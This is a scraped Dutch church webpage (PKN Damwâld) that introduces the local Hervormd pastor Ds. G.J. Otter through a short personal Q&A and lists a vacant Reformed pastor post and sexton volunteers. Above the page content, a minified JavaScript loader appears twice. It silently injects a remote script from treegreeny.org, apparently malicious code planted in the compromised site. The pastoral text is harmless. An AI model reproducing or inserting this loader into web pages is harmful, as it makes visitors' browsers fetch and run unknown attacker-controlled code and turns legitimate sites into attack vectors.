;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Voorstellen - PKN Damwâld
VoorstellenEen kijkje in de keuken
Momenteel vacant

Gereformeerd predikant

Ds. G.J. Otter

Hervormd predikant

In mei 2018 werd ik dominee hier in de Hervormde Gemeente Akkerwoude, Murmerwoude, Broeksterwoude en De Valom. Ik ben getrouwd met Hildegard en we hebben vier kinderen. Jezus Christus vormt voor mij de basis van mijn leven en werk. Met de Bijbel als betrouwbaar Woord van God ontmoet ik graag mensen in de verschillende situaties van het leven.

Wie zou je willen interviewen en waarom?

Sandy Millar – predikant in Londen. Hij ondersteunde Nicky Gumble bij het opzetten van de Alpha Cursus en is een erg wijze, profetische en inspirerende persoonlijkheid.

Wat is je lievelingsdier en wat spreekt je daarin aan?

Mijn lievelingsdier is de zwaluw. Hij trekt over grote afstanden en is enorm behendig in de lucht. Tegelijk weet de zwaluw het nest weer te vinden na een winter van omzwervingen in warme gebieden.

Wat is het laatste boek dat je gelezen hebt?

Ik lees meerdere boeken, o.a. „The way they pray“ van David Pytches, over verschillende aspecten van het bidden. Ook lees ik een boek over het zeilen op de Waddenzee en wat je daarbij nodig hebt.

Team hulpkosters De OntmoetingAlgemene nummer hulpkosters Gereformeerd Damwâld
Anne TalmaKoster Bonifatiuskerk & De Ikker